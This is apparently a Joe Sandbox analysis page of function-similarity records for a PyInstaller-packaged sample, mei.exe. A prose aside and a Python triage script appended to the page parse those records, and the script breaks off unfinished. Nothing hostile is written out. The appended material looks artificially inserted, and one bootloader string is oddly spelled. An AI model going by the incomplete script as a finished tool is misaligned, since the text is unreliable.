• Opcode ID: 7dd94d5086c8e676508beb35055c37e4fc1a8f6a26676c513fea433a4812c29e
• Instruction ID: a9552532084b0068c97a0e7797d3f58f23f8a86529aa329c6a535d00d2e7cde2
• Opcode Fuzzy Hash: 7dd94d5086c8e676508beb35055c37e4fc1a8f6a26676c513fea433a4812c29e
• Instruction Fuzzy Hash: 0AD09265F0874642FB582B7168990BC1295AF88701F00283CD9AF86397DE3DAD0DA350
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: Initialize_invalid_parameter_noinfo_set_fmode
• String ID:
• API String ID: 3548387204-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6313EAE49,?,?,00000000,00007FF6313EAEFE), ref: 00007FF6313EB03A
• GetLastError.KERNEL32(?,?,?,00007FF6313EAE49,?,?,00000000,00007FF6313EAEFE), ref: 00007FF6313EB044
Similarity
• API ID: ChangeCloseErrorFindLastNotification
• String ID:
• API String ID: 1687624791-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6313E966A,?,?,00000000,00007FF6313E9B5E,?,?,?,?,00007FF6313F1904,?,?,00000000), ref: 00007FF6313F2F70
• FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF6313E966A,?,?,00000000,00007FF6313E9B5E,?,?,?,?,00007FF6313F1904,?,?,00000000), ref: 00007FF6313F2FDA
Similarity
• API ID: EnvironmentStrings$Free
• String ID:
• API String ID: 3328510275-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6313E7DE9), ref: 00007FF6313E7F8F
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6313E7DE9), ref: 00007FF6313E7FA5
Similarity
• API ID: Time$System$FileLocalSpecific
• String ID:
• API String ID: 1707611234-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADD2
• GetLastError.KERNEL32(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADDC
Similarity
• API ID: BoundaryDeleteDescriptorErrorLast
• String ID:
• API String ID: 2050971199-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryErrorLastRemove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 377330604-0
                                                                                                                                                                      • Opcode ID: 6ff3d99c67922d469825cfff7fe5e58342db75af1525cbe8060fd6701dbb96da
                                                                                                                                                                      • Instruction ID: 75e56f1fa7eb79f5716a1571ce7fd59a38c0667e8d990874ad9526e1e6eb688a
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ff3d99c67922d469825cfff7fe5e58342db75af1525cbe8060fd6701dbb96da
                                                                                                                                                                      • Instruction Fuzzy Hash: 58D0C965E1C70381FB282775584543921D41F44721F501630D829D03D8DE3CAA9A2221
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteErrorFileLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2018770650-0
                                                                                                                                                                      • Opcode ID: fc8f820fc9b91dc181bea620848d5269d8dbacdd750ce58dcb7d95aa84ebb1b2
                                                                                                                                                                      • Instruction ID: fffd665ade09a523ac7a8c27459708c24c36fd53b45e4d52651056ee1e17650b
                                                                                                                                                                      • Opcode Fuzzy Hash: fc8f820fc9b91dc181bea620848d5269d8dbacdd750ce58dcb7d95aa84ebb1b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 82D01265F5C703C1F71427764C4513915D46F44731F505670D03DC13D4DF3CA9492161
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF6313D8A90: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8ACA
                                                                                                                                                                      • _findclose.LIBCMT ref: 00007FF6313D7F49
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2772937645-0
                                                                                                                                                                      • Opcode ID: 57151f018b2aaccc585e5652e51fbd64895772c6a2ebb2f952775244d57fa877
                                                                                                                                                                      • Instruction ID: 48ed1084e347337d49c489e5fea76406b0f198cba4fd72eebe3e44c78ca4f5d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 57151f018b2aaccc585e5652e51fbd64895772c6a2ebb2f952775244d57fa877
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E715953E18AC581EB218B2CD5052FD6360FBA9B4CF55E321DB9C52692EF38E2D9C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 0f81d7c0ab4aef1fc6aa925a0828f2714494c290b473dbacdd844052ec445c74
                                                                                                                                                                      • Instruction ID: 03b4e4f762242e4d0f251e8fde903c8ade8f55112b23e9e0554441c68ff406cb
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f81d7c0ab4aef1fc6aa925a0828f2714494c290b473dbacdd844052ec445c74
                                                                                                                                                                      • Instruction Fuzzy Hash: 96419A33D0834587FB249A29A5402BD77A1EB55B90F142231DA8AC37D5CF3CEA02EB61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                      • Opcode ID: bab311979b83b2973ab1d89e9b67bc8ccda33c15df6cb7365b3a0b162b306b4b
                                                                                                                                                                      • Instruction ID: 9e1c1b794cac304622b9d0fea5d178e07c58b819e3de3b087b4a7b16867b2297
                                                                                                                                                                      • Opcode Fuzzy Hash: bab311979b83b2973ab1d89e9b67bc8ccda33c15df6cb7365b3a0b162b306b4b
                                                                                                                                                                      • Instruction Fuzzy Hash: AD21AD26F083928AFB549A2269047FAA641FF45FD4F885070EE0C8B7A6CE3CF545D600
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 4fc26fdc08108ed44d7d55adeff722dd0293d64556b497ec72aef404f0094ea5
                                                                                                                                                                      • Instruction ID: 9efeb3264979f86c4306c55114c24d4792993cbdbebc8bc7b05aa2f6a4726177
                                                                                                                                                                      • Opcode Fuzzy Hash: 4fc26fdc08108ed44d7d55adeff722dd0293d64556b497ec72aef404f0094ea5
                                                                                                                                                                      • Instruction Fuzzy Hash: E631B033E1970285F7525B6598413BC3650AF80B54F512135EA1D873D2CF7CEE42A7B1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6313EB856,?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2), ref: 00007FF6313EF05D
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(?,?,?,00007FF6313E0CD4,?,?,?,00007FF6313E21E6,?,?,?,?,?,00007FF6313E37D9), ref: 00007FF6313EDAAA
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: DirectoryErrorLastRemove
• String ID:
• API String ID: 377330604-0
• Opcode ID: a4f4f863bbf95936c632da63c180b93ee955cabe46756af888466d1a6332f086
• Instruction ID: f7895822ea831bd7ea2efbcc111916847341c54a9ef2dd50180e39f4e425e615
• Opcode Fuzzy Hash: a4f4f863bbf95936c632da63c180b93ee955cabe46756af888466d1a6332f086
• Instruction Fuzzy Hash: A1418F16E1C6C581FB119B2895112FD2370FFA5B84F44A276DB8D922A3EF38B6D89300
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 190572456-4266016200
• Opcode ID: 75da080be946a2cd8ba8e1b454c823e383fc18c1915e405073f2aaa9ec7d6da3
• Instruction ID: 9f64be5151cd894e400576c56bf008781c0a9af9d029130a408ec45c96dc2600
• Opcode Fuzzy Hash: 75da080be946a2cd8ba8e1b454c823e383fc18c1915e405073f2aaa9ec7d6da3
• Instruction Fuzzy Hash: 581261A4E8EB0390FF5ACB19E85057423F1AF59790B946435C82E973A4EF7CB569B300
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
• String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
• API String ID: 2446303242-1601438679
• Opcode ID: bd898f0db48e12eacbe359e455c65c9f86494896ecfc44a00e7b3fd1842e94f6
• Instruction ID: efbd25481952074c16734d6c047db77698b6af13268dcd6960cea966ba415f01
• Opcode Fuzzy Hash: bd898f0db48e12eacbe359e455c65c9f86494896ecfc44a00e7b3fd1842e94f6
• Instruction Fuzzy Hash: 42A16C76A08B8587E714CF12E55479AB3B0FB88B84F50452AEB9D47B28CF3DE165CB40
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
• Opcode ID: 0ccec4e05d241f6952ecbbf9a3ebe3f86c42949c8e32c68598c284628b963db6
• Instruction ID: 77a0b4049f423e67124d1ea86c3cca839823efeb7faff409ecd3043ece27af0e
• Opcode Fuzzy Hash: 0ccec4e05d241f6952ecbbf9a3ebe3f86c42949c8e32c68598c284628b963db6
• Instruction Fuzzy Hash: 51B2BE72E1C2828BF7658E68D540BFD37E1FB54388F545135DA2E97B88DF38AA049B40
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00007FF6313D29FE,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D8537
• FormatMessageW.KERNEL32 ref: 00007FF6313D8566
• WideCharToMultiByte.KERNEL32 ref: 00007FF6313D85BC
  • Part of subcall function 00007FF6313D2980: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
  • Part of subcall function 00007FF6313D2980: MessageBoxW.USER32 ref: 00007FF6313D2A90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: ErrorLastMessage$ByteCharFormatMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
• API String ID: 2920928814-3505189403
• Opcode ID: bc7b3eaa85e9f8c684efbfb0abf8c740a9d6d3509a191f947940c97d6b2913ba
• Instruction ID: fcc730c6fe9bea3c7f4aaefe345eb64c115da2a067a142cd1d83326bf40900c7
• Opcode Fuzzy Hash: bc7b3eaa85e9f8c684efbfb0abf8c740a9d6d3509a191f947940c97d6b2913ba
• Instruction Fuzzy Hash: 28213B71E0CA4292FB649B15EC5437A63A5FF88384F840135E69DC27A9EF3CE555E700
Uniqueness

Uniqueness Score: -1.00%
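Three of the records above carry strings that belong to the PyInstaller bootloader rather than to hand-written native code: the GetProcAddress resolver with its "Failed to get address for Py..." messages, the "Failed to execute script '%ls' due to unhandled exception" dialog, and the pyi_win32_utils_to_utf8 error path. Together they show that mei.exe is a PyInstaller-packaged Python program, so the logic worth reversing is in the bundled .pyc archive, not in these functions. The script below is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself: it parses function records in the bullet format shown on this page and flags those bootloader indicators. The marker strings are an assumption taken from PyInstaller's bootloader sources, matched on the function name rather than the "PyInstaller:" prefix so the report's rendering of that prefix does not matter; the sample input is a constructed, shortened excerpt of the records above.

```python
"""Triage helper for Joe Sandbox "Similarity" function records (added example,
not part of the report).  Parses the bullet-list record format and flags the
strings that identify the PyInstaller bootloader.  Marker strings are assumed
from PyInstaller's bootloader sources; SAMPLE_REPORT is a constructed excerpt."""
import re
from dataclasses import dataclass, field

# Substrings only the PyInstaller bootloader emits (assumption: from its sources).
PYINSTALLER_MARKERS = (
    "Failed to execute script",        # unhandled-exception dialog in pyi_main.c
    "pyi_win32_utils_to_utf8",         # error path in pyi_win32_utils.c
    "Failed to get address for Py",    # Python C-API symbol resolution in pyi_python.c
)

# Report bullets we keep; Source File / Associated / Snapshot lines are skipped.
FIELD_MAP = {
    "API ID": "api_id",
    "String ID": "string_id",
    "API String ID": "api_string_id",
    "Opcode ID": "opcode_id",
    "Instruction Fuzzy Hash": "instruction_fuzzy_hash",
}
BULLET = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
GETADDR_PREFIX = "Failed to get address for "


@dataclass
class FunctionRecord:
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""
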